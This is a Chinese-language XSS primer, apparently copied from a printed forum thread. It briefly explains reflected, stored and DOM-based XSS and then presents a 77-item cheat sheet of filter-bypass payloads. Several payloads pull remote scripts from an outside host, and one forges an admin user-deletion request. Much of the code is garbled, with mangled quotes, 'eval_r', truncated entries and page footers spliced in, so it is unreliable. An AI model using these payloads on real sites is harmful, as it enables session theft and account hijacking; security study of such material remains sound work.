xss攻擊的初步瞭解

什麼是XSS攻擊 
XSS又叫CSS  (Cross Site Script) ，跨站腳本攻擊。它指的是惡意攻擊者往Web頁面裏插入惡意HTML代碼和客戶端腳本,當用戶瀏覽該頁之時，嵌入其中Web裏面的html代碼會被執行，從而達到惡意用戶的特殊目的。

攻擊目的：

其一：盜走客戶端 cookies，或者任何能夠用於在 Web 站點肯定客戶身份的其餘敏感信息 .

其二：經過腳本注入DB，攻擊web站點。

攻擊危害：

掛馬，盜取用戶Cookie，DOS（拒絕服務）客戶端瀏覽器，釣魚攻擊，高級的釣魚技巧。

，刪除目標文章、惡意篡改數據、嫁禍，劫持用戶Web行爲，甚至進一步滲透內網，爆發Web2.0蠕蟲，蠕蟲式的DDoS攻擊，蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網上數據。

XSS分類

XSS有三類：反射型XSS(非持久型)、存儲型XSS(持久型)和DOM XSS。

一、反射型XSS

發出請求時，XSS代碼出如今URL中，做爲輸入提交到服務器端，服務器端解析後響應，XSS代碼隨響應內容一塊兒傳回給瀏覽器，最後瀏覽器解析執行XSS代碼。這個過程像一次反射，故叫反射型XSS。

一個簡單的例子：

http://www.a.com/xss/reflect.php的代碼以下：

<?php

echo $_GET['x'];

?>

若是輸入x的值未經任何過濾就直接輸出，提交：

http://www.foo.com/xss/reflect.php?x=<script>alert(1)</script>

則alert()函數會在瀏覽器觸發。

二、存儲型XSS

存儲型XSS和反射型XSS的差異僅在於，提交的代碼會存儲在服務器端（數據庫，內存，文件系統等），下次請求目標頁面時不用再提交XSS代碼

最典型的例子是留言板XSS，用戶提交一條包含XSS代碼的留言存儲到數據庫，目標用戶查看留言板時，那些留言的內容會從數據庫查詢出來並顯示，瀏覽器發現有XSS代碼，就當作正常的HTML與Js解析執行，因而觸發了XSS攻擊。

三、DOM XSS

DOM XSS和反射型XSS、存儲型XSS的差異在於DOM XSS的代碼並不須要服務器參與，觸發XSS靠的是瀏覽器端的DOM解析，徹底是客戶端的事情。

http://www.a.com/xss/domxss.html代碼以下：

<script>

eval(location.hash.substr(1));

</script>

觸發方式爲：http://www.a.com/xss/domxss.html#alert(1)

這個URL#後的內容是不會發送到服務器端的，僅僅在客戶端被接收並解執行。

xss攻擊測試工具或者站點

待收集

常見的輸入點有：

document.URL
document.URLUnencoded
document.location
document.referrer
window.location
window.name
xhr請求回來的數據
document.cookie
表單項的值
常見的輸出點有：
直接輸出html內容，如：
document.write(...)
document.writeln(...)
document.body.innerHtml=...
直接修改DOM樹（包括DHTML）如：
document.forms[0].action...(以及其餘集合，如：一些對象的src/href屬性等)
document.attachEvent(...)
document.create...(...)
document.execCommand(...)
document.body. ...(直接經過body對象訪問DOM)
window.attachEvent(...)
替換document URL,如：
document.location=...(以及直接賦值給location的href,host,hostname屬性)
document.location.hostname=...
document.location.replace(...)
document.location.assign(...)
document.URL=...
window.navigate(...)
打開或修改新窗口，如：
document.open(...)
window.open(...)
window.location.href=...(以及直接賦值給location的href,host,hostname屬性)直接執行腳本，如：
eval(...)
window.execScript(...)
window.setInterval(...)
window.setTimeout(...)

______________________附常見的XSS攻擊方法_________________________

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG標籤XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG標籤無分號無引號
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG標籤大小寫不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML編碼(必須有分號)
<IMG SRC=javascript:alert(「XSS」)>
(6)修正缺陷IMG標籤
<IMG 「」"><SCRIPT>alert(「XSS」)</SCRIPT>」>
(7)formCharCode標籤(計算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode編碼(計算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)
<IMG SRC=jav..省略..S')>
(10)十六進制編碼也是沒有分號(計算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
(11)嵌入式標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(12)嵌入式編碼標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(13)嵌入式換行符
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(14)嵌入式回車
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(15)嵌入式多行注入JavaScript,這是XSS極端的例子
<IMG SRC=」javascript:alert(‘XSS‘)」>
(16)解決限制字符(要求同頁面)
<script>z=’document.’</script>
<script>z=z+’write(「‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>」)’</script>
<script>eval_r(z)</script>
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print 「<IMG SRC=java\0script:alert(\」XSS\」)>」;’ > out
(18)空字符2,空字符在國內基本沒效果.由於沒有地方能夠利用
perl -e ‘print 「<SCR\0IPT>alert(\」XSS\」)</SCR\0IPT>」;’ > out
(19)Spaces和meta前的IMG標籤
<IMG SRC=」 javascript:alert(‘XSS’);」>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=」http://3w.org/XSS/xss.js」></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(「XSS」)>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=」http://3w.org/XSS/xss.js」></SCRIPT>
(23)雙開括號
<<SCRIPT>alert(「XSS」);//<</SCRIPT>
(24)無結束腳本標記(僅火狐等瀏覽器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)無結束腳本標記2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半開的HTML/JavaScript XSS
<IMG SRC=」javascript:alert(‘XSS’)」
(27)雙開角括號
<iframe src=http://3w.org/XSS.html <
(28)無單引號 雙引號 分號
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)換碼過濾的JavaScript
\」;alert(‘XSS’);//
(30)結束Title標籤
</TITLE><SCRIPT>alert(「XSS」);</SCRIPT>
(31)Input Image
<INPUT SRC=」javascript:alert(‘XSS’);」>
(32)BODY Image
<BODY BACKGROUND=」javascript:alert(‘XSS’)」>
(33)BODY標籤
<BODY(‘XSS’)>
(34)IMG Dynsrc
<IMG DYNSRC=」javascript:alert(‘XSS’)」>
(35)IMG Lowsrc
<IMG LOWSRC=」javascript:alert(‘XSS’)」>
(36)BGSOUND
<BGSOUND SRC=」javascript:alert(‘XSS’);」>
(37)STYLE sheet
<LINK REL=」stylesheet」 HREF=」javascript:alert(‘XSS’);」>
(38)遠程樣式表
<LINK REL=」stylesheet」 HREF=」http://3w.org/xss.css」>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(「javascript:alert(‘XSS’)」);}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(「XSS」)’></STYLE><UL><LI>XSS
(41)META連接url
<META HTTP-EQUIV=」refresh」 CONTENT=」0;
URL=http://;URL=javascript:alert(‘XSS’);」>
(42)Iframe
<IFRAME SRC=」javascript:alert(‘XSS’);」></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=」javascript:alert(‘XSS’);」></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
(44)Table
<TABLE BACKGROUND=」javascript:alert(‘XSS’)」>
(45)TD
<TABLE><TD BACKGROUND=」javascript:alert(‘XSS’)」>
(46)DIV background-image
<DIV STYLE=」background-image: url(javascript:alert(‘XSS’))」>
(47)DIV background-image後加上額外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=」background-image: url(javascript:alert(‘XSS’))」>
(48)DIV expression
<DIV STYLE=」width: expression_r(alert(‘XSS’));」>
(49)STYLE屬性分拆表達
<IMG STYLE=」xss:expression_r(alert(‘XSS’))」>
(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE=」xss:expression_r(alert(‘XSS’))」>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(「javascript:alert(‘XSS’)」);}</STYLE><A
CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(「XSS」))’>
(53)STYLE background
<STYLE><STYLE
type=」text/css」>BODY{background:url(「javascript:alert(‘XSS’)」)}</STYLE>
(54)BASE
<BASE HREF=」javascript:alert(‘XSS’);//」>
(55)EMBED標籤,你能夠嵌入FLASH,其中包涵XSS
<EMBED SRC=」http://3w.org/XSS/xss.swf」 ></EMBED>
(56)在flash中使用ActionScrpt能夠混進你XSS的代碼
a=」get」;
b=」URL(\」";
c=」javascript:」;
d=」alert(‘XSS’);\」)」;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上
<HTML xmlns:xss>
<?import namespace=」xss」 implementation=」http://3w.org/XSS/xss.htc」>
<xss:xss>XSS</xss:xss>
</HTML>
(58)若是過濾了你的JS你能夠在圖片裏添加JS代碼來利用
<SCRIPT SRC=」」></SCRIPT>
(59)IMG嵌入式命令,可執行任意命令
<IMG SRC=」http://www.XXX.com/a.php?a=b」>
(60)IMG嵌入式命令(a.jpg在同服務器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)繞符號過濾
<SCRIPT a=」>」 SRC=」http://3w.org/xss.js」></SCRIPT>
(62)
<SCRIPT =」>」 SRC=」http://3w.org/xss.js」></SCRIPT>
(63)
<SCRIPT a=」>」 」 SRC=」http://3w.org/xss.js」></SCRIPT>
(64)
<SCRIPT 「a=’>’」 SRC=」http://3w.org/xss.js」></SCRIPT>
(65)
<SCRIPT a=`>` SRC=」http://3w.org/xss.js」></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<SCRIPT a=」>’>」 SRC=」http://3w.org/xss.js」></SCRIPT>
(67)
<SCRIPT>document.write(「<SCRI」);</SCRIPT>PT SRC=」http://3w.org/xss.js」>
</SCRIPT>
(68)URL繞行
<A HREF=」http://127.0.0.1/」>XSS</A>
(69)URL編碼
<A HREF=」http://3w.org」>XSS</A>
(70)IP十進制
<A HREF=」http://3232235521″>XSS</A>
(71)IP十六進制
<A HREF=」http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八進制
<A HREF=」http://0300.0250.0000.0001″>XSS</A>
(73)混合編碼
<A HREF=」h
tt p://6 6.000146.0×7.147/」">XSS</A>
(74)節省[http:]
<A HREF=」//www.google.com/」>XSS</A>
(75)節省[www]
<A HREF=」http://google.com/」>XSS</A>
(76)絕對點絕對DNS
<A HREF=」http://www.google.com./」>XSS</A>
(77)javascript連接
<A HREF=」javascript:document.location=’http://www.google.com/’」>XSS</A>